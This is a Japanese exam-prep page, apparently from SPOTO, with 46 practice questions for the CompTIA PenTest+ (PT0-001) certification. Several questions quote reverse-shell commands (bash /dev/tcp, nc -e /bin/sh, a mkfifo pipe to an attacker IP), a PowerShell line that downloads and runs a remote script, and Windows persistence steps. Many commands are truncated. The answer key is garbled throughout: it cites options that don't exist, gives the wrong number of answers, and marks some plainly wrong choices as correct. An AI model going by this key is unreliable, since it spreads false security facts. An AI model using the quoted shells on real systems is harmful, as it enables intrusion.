すべての情報を見逃したくないですか?

認定試験に合格するためのヒント

最新の試験ニュースと割引情報

当社の専門家による厳選最新情報

はい、ニュースを送ってください

CompTIA PT0-001認定試験問題集、CompTIA PenTest+認定資格|SPOTO

弊社の総合的なリソースでCompTIA PenTest+ (PT0-001)の認定試験を準備しましょう。弊社の模擬試験問題集は最新試験問題に基づいて作成されており、受験者の皆様が試験準備をより効果的に進めることができるようデザインされています。PT0-001認定資格は実地能力に重点を置いたユニークな資格で、従来のデスクトップやサーバーだけでなく、クラウドやモバイルプラットフォームなど多様な環境で受験者をテストします。弊社の試験問題集やサンプル問題集と模擬試験で練習すれば、あなたは試験内容を深く理解し、周到に準備することができます。当社の模擬試験と試験シミュレータはあなたの準備態勢をさらに強化し、試験当日の成功を確実にします。弊社のCompTIA PenTest+問題集を利用して自信をつけて、CompTIA PenTest+認定資格を取得しましょう。
他のオンライン試験を受ける

質問 #1
侵入テスト者が次のコマンドを実行します:攻撃者が悪用しているローカルホストの脆弱性はどれか。
A. 安全でないファイル・パーミッション
B. アプリケーションのホワイトリスト化
C. シェルエスケープ
D. 書き込み可能なサービス
回答を見る
正解: D
質問 #2
ある侵入テスト実施者が、業務に対する全体的なリスクレベルを概説する報告書を書いている最中である。ペネトレーション・テスターは、報告書の次のどの部分にこれを書くべきでしょうか?
A. 付録
B. 要旨
C. 技術的要約
D. 本体
回答を見る
正解: B
質問 #3
次のPythonスクリプトがあるとします:出力の行き先はどれですか?
A. スクリーンへ
B. ネットワークサーバーへ
C. ファイルへ
D. dev/nullへ
回答を見る
正解: A
質問 #4
ある侵入テスト実施者が、無線スニファからの以下の出力を確認しています:上記の情報から推定できるのはどれですか?
A. ハードウェア・ベンダー
B. チャンネル干渉
C. ユーザー名
D. 主な強み
回答を見る
正解: ACG
質問 #5
侵入テスト者は、IP 10.0.0.20を持つリモートで侵害されたホストからグラフィックコンソールウィンドウを起動し、IP 192.168.1.10を持つローカルコンピュータにターミナルを表示したいと考えています。このタスクを達成できるのは、次のうちどれでしょうか。
A. リモートコンピュータから、次のコマンドを実行します。 export XHOST 192
B. ローカルコンピュータから、次のコマンドを実行します。 ssh -L4444:127
C. リモートコンピュータから、次のコマンドを実行します。 ssh -R6000:127
D. ローカルコンピューターから次のコマンドを実行します。
回答を見る
正解: D
質問 #6
あるセキュリティコンサルタントが、今度の侵入テストの範囲を概説した文書を受け取る。この文書には、IPアドレスと、それぞれをスキャンできる時間が記載されています。この情報が含まれているのは、次のうちどれでしょうか?
A. 交戦規定
B. 提案依頼
C. 基本サービス契約
D. ビジネスインパクト分析
回答を見る
正解: A
質問 #7
あるクライアントが、コンプライアンス目的で外部ネットワーク侵入テストを依頼した。クライアントと侵入テスト実施者との話し合いの中で、クライアントは、テスト期間中、侵入テスト実施者のソース IP アドレスをクライアントの IPS ホワイトリストに追加することに消極的であることを表明しました。侵入テスト実施者のソース IP アドレスをホワイトリストに追加すべき理由として、最も適切な議論は次のうちどれですか。
A. ホワイトリストは、IPS やログ監視システムに対する不用意な DoS 攻撃を防止する。
B. サードパーティ製 IPS システムの侵入テストでは、多くの場合、追加の文書と承認が必要であり、一刻を争うテストを遅らせる可能性がある。
C. IPSのホワイトリスト・ルールは、常に最新の状態に保つために頻繁な更新が必要であり、常に脆弱性が開発され、新たに弱点が発見される。
D. テストは、IPS のような能動的な防御の相対的な有効性を判断することではなく、対象範囲内の全システムにわ たる可能性のあるセキュリティ問題の発見に重点を置くべきである。
回答を見る
正解: A
質問 #8
物理的なセキュリティ評価中に「アンダー・ザ・ドアー・ツール」を使用することは、次のどのタイプの侵入テクニックの例ですか?
A. 鍵開け
B. 出口センサーのトリガー
C. ロックバンピング
D. ロックバイパス
回答を見る
正解: A
質問 #9
ある侵入テスト者がスイッチに対してARPスプーフィングを行っている。侵入テスト者が最も多くの情報を得るためになりすますべきはどれか。
A. クライアントのMACアドレス
B. ドメインコントローラーのMACアドレス
C. ウェブサーバーのMACアドレス
D. ゲートウェイのMACアドレス
回答を見る
正解: A
質問 #10
次のコマンドのどれがMetasploitデータベースを起動しますか?
A. msfconsole
B. ワークスペース
C. msfvenom
D. db_init
E. db_connect
回答を見る
正解: AB
質問 #11
クレデンシャル・ブルートフォース攻撃を実行するために使用されるツールはどれか。
A. ヒドラ
B. ジョン・ザ・リッパー
C. ハッシュキャット
D. ピーチ
回答を見る
正解: D
質問 #12
ある医療機関は、対象となる個人の個人健康情報を保護し、その保護を証明するために、地域の規制に従わなければならない。ペネトレーションテスターがアセスメントを実施する際に特にテストすべき条件はどれか。(2つ選択)。
A. SNMPトラップデータの暗号化された暴露
B. IT発券システムに常駐するソフトウェアのバグ
C. CA が定義する S/MIME 証明書テンプレート
D. HTTPで通信される健康情報
E. 記録サーバーのDAR暗号化
回答を見る
正解: A
質問 #13
ウェブアプリケーションの評価中に、侵入テスト者はサーバ上で任意のコマンドが実行できることを発見しました。この攻撃をさらに一歩進めたいと考え、侵入テスト者は 192.168.1.5 にある攻撃マシンに戻るリバースシェルを得る方法を探り始めます。次のうち、可能な方法はどれか。(2つ選んでください)。
A. nc 192
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
D. nc -e /bin/sh 192
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
回答を見る
正解: A
質問 #14
限られた権限のWindowsシステムで永続性を維持しようとするとき、テスト担当者は次のレジストリキーのどれを使うべきか。
A. hkey_classes_root
B. hkey_local_machine
C. hkey_current_user
D. hkey_current_config
回答を見る
正解: D
質問 #15
あるペネトレーション・テスターが、ある新興企業のセキュリティ評価を行った。レポートには、合計 10 件の脆弱性がリストアップされており、そのうち 5 件が「クリティカル(critical)」であると特定されています。クライアントには、すべての脆弱性を直ちに修正するリソースがありません。このような状況では、次のうちどれがクライアントにとって最良の提案でしょうか?
A. リスクを最小化するために、重要な脆弱性に対して容易な代償措置を適用し、その後、是正の優先順位を付け直す。
B. 最も早く改善できる問題を特定し、まずそれに対処する。
C. C
D. たとえ他の脆弱性の修正に非常に長い時間がかかるとしても、最もクリティカルな脆弱性を最初に修正する。
回答を見る
正解: B
質問 #16
ある侵入テスト実施者が、NETBIOSネームサービスをターゲットにしたいと考えています。NETBIOSネームサービスを悪用する最も可能性の高いコマンドはどれか。
A. arpspoof
B. nmap
C. レスポンダー
D. バープスイート
回答を見る
正解: A
質問 #17
ある侵入テスト実施者が、あるアプリケーションがインターネットに面したアプリケーションで基本認証しか利用していないと報告しました。次のうち、最も適切な改善策はどれか。
A. HTTP Strict Transport Securityを有効にする。
B. 安全なクッキーフラグを有効にする。
C. 通信路を暗号化する。
D. 無効なユーザー入力をサニタイズする。
回答を見る
正解: C
質問 #18
Linuxシステムに低特権で最初にアクセスした後、侵入テスト担当者は、あるユーザーのホームフォルダにある''changepass''というタイトルの興味深いバイナリを特定する。 -sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass changepassからASCII印刷可能な文字を出力するために "strings "を使用し、テスト者は以下のようにメモする:文字列 changepass exit setuid strcmp GLIBC_2.0 ENV_PATH %s/changepw malloc strlen この情報が与えられた場合、root p を達成するために悪用される可能性が最も高い経路は次のうちどれでしょうか。
A. changepass を書き込み可能なディレクトリにコピーし、環境変数 ENV_PATH を changepw というタイトルのトークン盗みバイナリのパスにエクスポートする。そして changepass を実行してください。
B. 同じディレクトリに changepass のコピーを作成し、名前を changepw とする。環境変数 ENV_PATH をパス '/home/user/' にエクスポートします。それから changepass を実行する。
C. 環境変数ENV_PATHを、changepwというタイトルのトークン盗みバイナリを含む書き込み可能なディレクトリのパスにエクスポートする。それから changepass を実行する。
D. 環境変数ENV_PATHを'/usr/local/bin'のパスにエクスポートした後、カレントディレクトリ内でsudoを使ってchangepassを実行する。
回答を見る
正解: A
質問 #19
ペネトレーションテスト契約における次の特性のうち、本番システムを最も高い負荷で観察し、テストする上で、最も大きな影響を与えるものはどれか。
A. 重要な生産システムのスコープを作成する
B. テストアクセス時間のスケジュール設定
C. ホワイトボックス・テストへの取り組みを確立する
D. 経営陣が押し付けがましいテストに同意すること
回答を見る
正解: C
質問 #20
次のシナリオのうち、テスターがKerberoasting攻撃を実行するのはどれですか?
A. テスト者は Windows デバイスを侵害し、LSA 秘密をダンプした。
B. テスターはSAMデータベースを取得し、パスワードハッシュをクラックする必要がある。
C. テスト者は限定特権ユーザーを侵害し、他のアカウントをターゲットにして横の動きをする必要があります。
D. テスト者はアカウントを侵害し、システムからハッシュと平文パスワードをダンプする必要があります。
回答を見る
正解: B
質問 #21
テスト中に、クライアントのコアサーバーに重大な脆弱性が発見された。次のうち、次のアクションはどれですか?
A. 影響を受けるサービスのネットワークポートを無効にする。
B. すべての調査結果をまとめ、クライアントに提出する。
C. 発見の詳細を速やかにクライアントに警告する。
D. 攻撃者に悪用されないように、ターゲットをオフラインにする。
回答を見る
正解: D
質問 #22
あるセキュリティ評価者が、Windows アプリケーションに取り込まれる解析機能のセキュリティをテストするために、特殊な XML ファイルを作成しようとしている。アプリケーションのテストを開始する前に、評価者が組織に要求すべきことは次のうちどれですか?
A. サンプルSOAPメッセージ
B. REST API ドキュメント
C. プロトコルファジングユーティリティ
D. 該当する XSD ファイル
回答を見る
正解: A
質問 #23
次のうち、企業方針の抜粋はどれでしょう?
A. 従業員のパスワードは、最低8文字、うち1文字は英数字でなければならない。
B. ヘルプデスク(800-passwd1)では、パスワードのリセットを行っています。
C. 従業員は、企業資産にアクセスする際に強力なパスワードを使用しなければならない。
D. 企業システムは、MD5 ハッシュアルゴリズムを使用してパスワードを保存する必要があります。
回答を見る
正解: B
質問 #24
悪用されたマシンの履歴ファイルに次の行があった。攻撃者は次のコマンドを実行しました: bash -i >& /dev/tcp/192.168.0.1/80 0> &1 このコマンドが何を行うかを説明しているのは次のうちどれですか?
A. ポートスキャンを実行します。
B. ウェブサーバーのバナーをつかむ。
C. TTY をリモートシステムにリダイレクトします。
D. 指定されたIPのエラーログを削除します。
回答を見る
正解: AC
質問 #25
侵入テスト者は、IT部門のメンバーをフィッシングすることで、最初のVPNユーザー・ドメインの認証情報を取得することができた。その後、侵入テスト者は VPN 経由でハッシュを取得し、辞書攻撃を使用して簡単にクラックしました。次のうち、どの修復ステップを推奨すべきか。(3つを選択)。
A. 全従業員にセキュリティ意識向上トレーニングの受講を義務付ける。
B. リモートアクセスに二要素認証を導入する。
C. 侵入防止システムを設置する。
D. パスワードの複雑さの要件を増やす。
E. セキュリティ情報イベント監視ソリューションを導入する。
F. IT部門のメンバーが管理者としてインタラクティブにログインできないようにする。
G. VPN ソリューションに使用する暗号スイートをアップグレードする。
回答を見る
正解: A
質問 #26
ある侵入テスト者は、邪悪な双子の配備に成功し、被害者のトラフィックを確認し始めている。侵入テスト者が取りたい次のステップは、暗号化されていない被害者のウェブトラフィックをすべてキャプチャすることです。この目標を達成するのに最適なものはどれか?
A. HTTPダウングレード攻撃を行う。
B. トラフィックを復号化するためにユーザー認証情報を採取する。
C. MITM攻撃を行う。
D. 信頼できるCAになりすましてCA攻撃を実行する。
回答を見る
正解: A
質問 #27
次のPowerShellコマンドを考えてみましょう。powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1");Invoke-Cmdlet このコマンドによって実行されるアクションを説明するBESTはどれですか?
A. 実行ポリシーを設定します。
B. リモートスクリプトを実行する。
C. エンコードされたコマンドを実行する。
D. オブジェクトをインスタンス化する。
回答を見る
正解: C
質問 #28
あるエネルギー会社が、発電と冷房を管理するために ICS を採用している発電所の侵入テストを実施するよう、セキュ リティ会社に委託した。このような環境特有の考慮事項として、セキュリティ会社がアセスメントの準備の際に行わなければならないものはどれか。
A. 適切なセキュリティテストツールの選択
B. ICS コンポーネントの電流定格と負荷定格
C. 潜在的な操業上および安全上の危険
D. 試験に使用するハードウェアの電気的認証
回答を見る
正解: DE
質問 #29
ある侵入テスト実施者が、公開ウェブ・サーバ上で複数の高番号のポートがリッスンしていることを観察する。しかし、システム所有者は、アプリケーションはポート443しか使用していないと言います。次のうちどれを推奨するのがベストでしょうか?
A. アプリケーションを別のポートに移行する。
B. 443番ポートを特定のIPアドレスにフィルタリングする。
C. Webアプリケーションファイアウォールを実装する。
D. 不要なサービスを無効にする。
回答を見る
正解: D
質問 #30
ある侵入テスト実施者が、サーバーファームが会社のソフトウェアベースラインに準拠しているかどうかを判断するためにリモートスキャンを実施しています。ベースラインへの準拠を確認するために、侵入テスト担当者が実行すべきことは次のうちどれですか。
A. ディスカバリー・スキャン
B. ステルススキャン
C. フルスキャン
D. クレデンシャルスキャン
回答を見る
正解: B
質問 #31
ある侵入テスト者が銀行アプリケーションをテストしていて、脆弱性を発見した。テスト者は非特権ユーザとしてログインしており、いかなるデータにもアクセスできないはずです。ウェブ傍受プロキシからの以下のデータがあるとします:次のうち、どのタイプの脆弱性が悪用されていますか?
A. 強制ブラウジングの脆弱性
B. パラメータ汚染の脆弱性
C. ファイルアップロードの脆弱性
D. クッキーの列挙
回答を見る
正解: A
質問 #32
フルスコープのセキュリティアセスメントにおいて、ターゲットに物理的に関与してソーシャルエンジニアリングするための前提条件はどれか。
A. 非常口の位置
B. 口実の準備
C. 被害者のショルダーサーフィン
D. 被害者への尾行
回答を見る
正解: A
質問 #33
あるセキュリティ・アナリストは、組織の DMZ 環境に対して実行された詳細な侵入レポートを提供された。レポートには、ある発見が CVSS ベーススコア 10.0 であることが記載されていました。この脆弱性を悪用するために必要な難易度は、次のうちどれでしょうか?
A. 非常に難しい。境界システムは通常ファイアウォールの背後にある。
B. 利用するにはかなりの処理能力を必要とする。
C. 些細なこと。この発見を利用するために必要な努力はほとんどない。
D. 不可能です。外部ホストは攻撃から保護するためにハード化されています。
回答を見る
正解: C
質問 #34
悪意のあるユーザーが、あるコンピューターにMITM攻撃を仕掛けようとしている。コンピュータのネットワーク構成を以下に示す:IP: 192.168.1.20 NETMASK: 255.255.255.0 DEFAULT GATEWAY: 192.168.1.254 DHCP: 192.168.1.253 DNS: 192.168.10.10, 192.168.20.10 悪意のあるユーザーがMITM攻撃を行うために実行すべきコマンドはどれか。
A. arpspoof -c both -r -t 192
B. arpspoof -t 192
C. arpspoof -c both -t 192
D. arpspoof -r -t 192
回答を見る
正解: D
質問 #35
ある侵入テスト実施者が、マーケティング担当社員のデバイスにアクセスした。侵入テスト者は、アクセスが発見された場合に、デバイスの制御を回復できるようにしたいと考えています。侵入テスト者は、デバイスへの永続性を維持するために、次のどのアクションを使用する必要がありますか?(2つ選択してください)。
A. HKLMSoftwareに、au57d
B. C:∕Windows∕Sm_2215↩drivers∕hostsに、12
C. C:◆users◆username◆local◆appdata◆roaming◆temp◆au57d
D. WindowsにRTAudioという偽のサービスを作成し、手動で実行する。
E. RTAudioのエントリをHKLM゠CurrentControl゠Services゠RTAudioに置く。
F. C:⊖Windows⊖Sm_2296↩drivers⊖hostsを呼び出すスケジュールタスクを作成する。
回答を見る
正解: AC
質問 #36
ある侵入テスト実施者が、SQL インジェクションコマンドをテキストボックスに入力し、データベース上の情報ストアにアクセスすることができました。この脆弱性を緩和するための推奨事項として、最も適切なものはどれか。
A. ログインに使用する認証情報をランダムにする。
B. ホストベースの侵入検知をインストールする。
C. 入力正規化を実行する。
D. システムハードニングを実行する。
回答を見る
正解: AE
質問 #37
ペネトレーション・テスターがOSINTを実施するために活用するツールは、次のうちどれでしょうか(2つ選択)。
A. 初段
B. セット
C. ビーエフ
D. ワイヤーシャーク
E. マルテゴ
F. ダイナモ
回答を見る
正解: CD
質問 #38
侵入テスト実施者が、作業終了時にchkconfig --del servicenameコマンドを実行する理由はどれか。
A. 永続性を削除するには
B. 永続性を有効にするには
C. 持続性を報告する
D. 持続性をチェックする
回答を見る
正解: A
質問 #39
次の状況のうち、侵入テスト実施者がテスト中にシステム所有者/クライアントと通信する可能性があるのはどれでしょうか(2つ選択してください)。
A. テスターがシステム上で個人を特定できるデータを発見すること。
B. システムに不正侵入の形跡がある。
C. システムは全体的に硬化不足を示している。
D. 悪用が試みられた後、システムが利用できなくなる。
E. テスターが、スコープ外のシステムで所見を発見した。
回答を見る
正解: A
質問 #40
ある侵入テスト担当者が、ある範囲のIPアドレスのすべてのRPTRレコードを発見する方法をスクリプト化したいと考えています。利用するのに最も効率的なのはどれか。
A. nmap -p 53 -oG dnslist
B. nslookup -ns 8
C. for x in {1
D. dig -r > echo "8
回答を見る
正解: D
質問 #41
ある侵入テスト実施者は、ウェブアプリケーションの侵入テスト中に、コンテンツセキュリティポリシーヘッダが欠落してい ることを観察します。侵入テスト実施者が最も実行しそうな技法はどれですか?
A. コマンド・インジェクション攻撃
B. クリックジャッキング攻撃
C. ディレクトリトラバーサル攻撃
D. リモートファイルインクルード攻撃
回答を見る
正解: D
質問 #42
侵入テスト実施者は、あるウェブアプリケーションのスキャン結果をレビューします。以下の脆弱性のうち、最もクリティカルで、悪用のために優先されるべきものはどれですか?
A. 保存されたXSS
B. フィルパスの開示
C. 失効した証明書
D. クリックジャッキング
回答を見る
正解: D
質問 #43
ある侵入テスト者が、ポート443経由で任意のホストに無制限にネットワークアクセスできるシステムを侵害する。侵入テスト者は、被害者から攻撃者に戻るリバースシェルを作成したいと考えています。侵入テスト者が最も使用しそうな方法はどれですか?
A. perl -e 'use SOCKET'; $i='
B. ssh superadmin@-p 443
C. nc -e /bin/sh443
D. bash -i >& /dev/tcp//443 0>&1
回答を見る
正解: D
質問 #44
侵入テスト実施者が、作業終了時にchkconfig --del servicenameコマンドを実行する理由はどれか。
A. 永続性を削除するには
B. 永続性を有効にするには
C. 持続性を報告する
D. 持続性をチェックする
回答を見る
正解: A
質問 #45
電気事業施設、天然ガス施設、ダム、原子力施設などで使用されているICSの重大なセキュリティ上の弱点について、最も適切なものはどれか。
A. ICS ベンダーは、適切なセキュリティ管理の実装が遅れている。
B. ICSスタッフは、基本的な職務を遂行するための十分な訓練を受けていない。
C. 重要な機器の交換機器が不足している。
D. ICS施設のコンプライアンスが欠如している。
回答を見る
正解: B
質問 #46
消費者ベースのIoTデバイスは、従来のデスクトップコンピュータ用に構築されたシステムよりも安全性が低いことが多い。その理由を最もよく表しているのは次のうちどれでしょうか?
A. IoT機器を開発するメーカーは、セキュリティへの関心が低い。
B. 管理者が全社的に同じセキュリティ基準を導入するのは難しい。
C. IoTシステムには、より安全なソリューションが必要とするハードウェアのパワーが不足していることが多い。
D. 規制当局は、IoT システムに対するセキュリティ要件を低く設定していることが多い。
回答を見る
正解: A

送信後に回答を表示する

質問の回答を得るには、電子メールと WhatsApp を送信してください。

注: 正しい試験結果を得ることができるように、電子メール ID と WhatsApp が有効であることを確認してください。

Eメール:
WhatsApp/電話番号: